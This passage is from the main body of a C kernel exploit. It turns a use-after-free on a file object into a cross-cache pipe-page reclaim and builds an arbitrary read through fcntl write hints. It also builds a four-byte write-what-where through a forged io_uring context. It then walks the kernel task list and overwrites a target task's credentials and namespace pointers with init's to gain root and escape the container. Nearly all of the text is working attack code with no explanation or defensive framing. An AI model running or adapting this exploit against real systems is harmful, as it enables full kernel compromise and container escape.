close(g_cc2_fds[i]);
close(g_cc3_fds[i]);
}
// Reset number trackers
g_cc1_num = 0;
g_cc2_num = 0;
g_cc3_num = 0;
}
// Do cross cache process
void do_cc(void)
{
// Start cross-cache process
cc_1();
cc_2();
// Allocate the victim filp
alloc_victim_filp();
// Free the victim filp
do_uaf();
// Resume cross-cache process
cc_3();
cc_4();
cc_5();
// Allow pages to be freed
usleep(100000);
}
void reset_pipe_buf(void)
{
char buf[4096] = { 0 };
read(g_pipe.fd[PIPE_READ], buf, 4096);
}
void zero_pipe_buf(void)
{
char buf[4096] = { 0 };
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}
// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL
// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 8 times to read 8 bytes
uint64_t val = 0;
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
*(uint64_t *)&buf[0x20] = target;
*(uint64_t *)&buf[0x120] = target;
*(uint64_t *)&buf[0x220] = target;
*(uint64_t *)&buf[0x320] = target;
*(uint64_t *)&buf[0x420] = target;
*(uint64_t *)&buf[0x520] = target;
*(uint64_t *)&buf[0x620] = target;
*(uint64_t *)&buf[0x720] = target;
*(uint64_t *)&buf[0x820] = target;
*(uint64_t *)&buf[0x920] = target;
*(uint64_t *)&buf[0xa20] = target;
*(uint64_t *)&buf[0xb20] = target;
*(uint64_t *)&buf[0xc20] = target;
*(uint64_t *)&buf[0xd20] = target;
*(uint64_t *)&buf[0xe20] = target;
*(uint64_t *)&buf[0xf20] = target;
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to val
val |= (arg << (i * 8));
}
return val;
}
void read_comm_at(unsigned long addr, char *comm)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 15 times to read 15 bytes
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
*(uint64_t *)&buf[0x20] = target;
*(uint64_t *)&buf[0x120] = target;
*(uint64_t *)&buf[0x220] = target;
*(uint64_t *)&buf[0x320] = target;
*(uint64_t *)&buf[0x420] = target;
*(uint64_t *)&buf[0x520] = target;
*(uint64_t *)&buf[0x620] = target;
*(uint64_t *)&buf[0x720] = target;
*(uint64_t *)&buf[0x820] = target;
*(uint64_t *)&buf[0x920] = target;
*(uint64_t *)&buf[0xa20] = target;
*(uint64_t *)&buf[0xb20] = target;
*(uint64_t *)&buf[0xc20] = target;
*(uint64_t *)&buf[0xd20] = target;
*(uint64_t *)&buf[0xe20] = target;
*(uint64_t *)&buf[0xf20] = target;
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to comm buf
comm[i] = arg;
}
}
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
// Copy our copied real ring fd
memcpy(&buf[g_off], g_ring_copy, 256);
// Set f->f_count to 1
uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
*count = 1;
// Set f->private_data to our scratch space
uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
*private_data = g_scratch;
// Set ctx->cqe_cached
size_t cqe_cached = g_scratch + 0x240;
cqe_cached &= 0xFFF;
uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
*cached_ptr = NULL_MEM;
// Set ctx->cqe_sentinel
size_t cqe_sentinel = g_scratch + 0x248;
cqe_sentinel &= 0xFFF;
uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];
// We need ctx->cqe_cached < ctx->cqe_sentinel
*sentinel_ptr = NULL_MEM + 1;
// Set ctx->rings so that ctx->rings->cq.tail is written to. That is at
// offset 0xc0 from cq base address
size_t rings = g_scratch + 0x10;
rings &= 0xFFF;
uint64_t *rings_ptr = (uint64_t *)&buf[rings];
*rings_ptr = where - 0xc0;
// Set ctx->cached_cq_tail which is our what
size_t cq_tail = g_scratch + 0x250;
cq_tail &= 0xFFF;
uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
*cq_tail_ptr = what;
// Set ctx->cq_wait the list head to itself (so that it's "empty")
size_t real_cq_wait = g_scratch + 0x268;
size_t cq_wait = (real_cq_wait & 0xFFF);
uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
*cq_wait_ptr = real_cq_wait;
}
void write_what_where(uint32_t what, uint64_t where)
{
// Reset the page contents
reset_pipe_buf();
// Setup the fake file target ctx
char buf[4096] = { 0 };
write_setup_ctx(buf, what, where);
// Set contents
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Get an sqe
struct io_uring_sqe *sqe = NULL;
sqe = io_uring_get_sqe(&g_ring);
if (!sqe)
{
err("`io_uring_get_sqe()` failed");
}
// Set values
sqe->opcode = IORING_OP_MSG_RING;
sqe->fd = g_uaf_fd;
int ret = io_uring_submit(&g_ring);
if (ret < 0)
{
err("`io_uring_submit()` failed");
}
// Wait for the completion
struct io_uring_cqe *cqe;
ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// So in this kernel code path, after we're done with our write-what-where, the
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_cred_where);
write_what_where(val_2 - 1, g_cred_where + 0x4);
}
void overwrite_real_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_real_cred_where);
write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}
void overwrite_nsproxy(void)
{
uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_nsproxy_where);
write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}
// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
else { return 0; }
}
void traverse_tasks(void)
{
// Process name buf
char current_comm[16] = { 0 };
// Get the next task after init
uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
uint64_t current = current_next - TASKS_NEXT_OFF;
if (!task_valid(current))
{
err("Invalid task after init: 0x%lx", current);
}
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// While we don't have NULL, traverse the list
while (task_valid(current))
{
current_next = read_8_at(current_next);
current = current_next - TASKS_NEXT_OFF;
if (current == g_init_task) { break; }
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// If we find the target comm, save it
if (!strcmp(current_comm, TARGET_TASK))
{
g_target_task = current;
}
// If we find our target comm, save it
if (!strcmp(current_comm, OUR_TASK))
{
g_our_task = current;
}
}
}
void find_pipe_buf_addr(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our fd in the array
files_ptr += (sizeof(uint64_t) * g_uaf_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Calculate the offset
g_off = curr_file & 0xFFF;
// Set the globals
g_file_addr = curr_file;
g_pipe_buf = g_file_addr - g_off;
return;
}
void make_ring_copy(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our ring fd in the array
files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Copy all the data into the buffer
for (size_t i = 0; i < 32; i++)
{
uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
*val_ptr = read_8_at(curr_file + (i * 8));
}
}
// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
g_scratch = g_pipe_buf;
if (g_off < 0x500) { g_scratch += 0x500; }
}
// We failed cross-cache stage, either because we didnt replace UAF object
void cc_fail(void)
{
cc_reset();
close(g_uaf_fd);
g_uaf_fd = -1;
release_pipe();
create_pipe();
sleep(1);
}
void write_pipe(unsigned char *buf)
{
if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
{
err("`write()` failed");
}
}
int main(int argc, char *argv[])
{
info("Setting up exploit environment...");
setup_env();
// Create a debug buffer
unsigned char buf[4096] = { 0 };
memset(buf, 'A', 4096);
retry_cc:
// Do cross-cache attempt
info("Attempting cross-cache...");
do_cc();
// Replace UAF file (and page) with pipe page
write_pipe(buf);
// Try to `lseek()` which should fail if we succeeded
if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
{
printf("[!] Cross-cache failed, retrying...");
cc_fail();
goto retry_cc;
}
// Success
info("Cross-cache succeeded");
sleep(1);
// Leak the `error_entry` pointer
uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
info("Leaked `error_entry` address: 0x%lx", error_entry);
// Make sure it seems kernel-ish
if ((uint16_t)(error_entry >> 48) != 0xFFFF)
{
err("Weird `error_entry` address: 0x%lx", error_entry);
}
// Set kernel base
g_kern_base = error_entry - EE_OFF;
info("Kernel base: 0x%lx", g_kern_base);
// Read 8 bytes at that address and see if they match our signature
uint64_t sig = read_8_at(g_kern_base);
if (sig != KERNEL_SIGNATURE)
{
err("Bad kernel signature: 0x%lx", sig);
}
// Set init_task
g_init_task = g_kern_base + INIT_OFF;
info("init_task @ 0x%lx", g_init_task);
// Get the cred and nsproxy values
g_cred_what = read_8_at(g_init_task + CRED_OFF);
g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);
if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
{
err("Weird init->cred value: 0x%lx", g_cred_what);
}
if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
{
err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
}
info("init cred address: 0x%lx", g_cred_what);
info("init nsproxy address: 0x%lx", g_nsproxy_what);
// Traverse the tasks list
info("Traversing tasks linked list...");
traverse_tasks();
// Check to see if we succeeded
if (!g_target_task) { err("Unable to find target task!"); }
if (!g_our_task) { err("Unable to find our task!"); }
// We found the target task
info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);
// Set where gadgets
g_cred_where = g_target_task + CRED_OFF;
g_real_cred_where = g_target_task + REAL_CRED_OFF;
g_nsproxy_where = g_target_task + NSPROXY_OFF;
info("Target cred @ 0x%lx", g_cred_where);
info("Target real_cred @ 0x%lx", g_real_cred_where);
info("Target nsproxy @ 0x%lx", g_nsproxy_where);
// Locate our file descriptor table
g_files = g_our_task + FILES_OFF;
g_fdt = read_8_at(g_files) + FDT_OFF;
g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;
info("Our files @ 0x%lx", g_files);
info("Our file descriptor table @ 0x%lx", g_fdt);
info("Our file array @ 0x%lx", g_file_array);
// Find our pipe address
find_pipe_buf_addr();
info("UAF file addr: 0x%lx", g_file_addr);
info("Pipe buffer addr: 0x%lx", g_pipe_buf);
// Set the global scratch space side of the page
set_scratch_space();
info("Scratch space base @ 0x%lx", g_scratch);
// Make a copy of our real io_uring file descriptor since we need to fake
// one
info("Making copy of legitimate io_uring fd...");
make_ring_copy();
info("Copy done");
// Overwrite our task's cred with init's
info("Overwriting our cred with init's...");
overwrite_cred();
// Make sure it's correct
uint64_t check_cred = read_8_at(g_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx",
check_cred, g_cred_what);
}
// Overwrite our real_cred with init's cred
sleep(1);
info("Overwriting our real_cred with init's...");
overwrite_real_cred();
// Make sure it's correct
check_cred = read_8_at(g_real_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
}
// Overwrite our nsproxy with init's
sleep(1);
info("Overwriting our nsproxy with init's...");
overwrite_nsproxy();
// Make sure it's correct
check_cred = read_8_at(g_nsproxy_where);
if (check_cred != g_nsproxy_what)
{
err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
check_cred, g_nsproxy_what);
}
info("Creds and namespace look good!");
// Let the child loose
*(int *)g_shmem = 0x1337;
sleep(3000);
}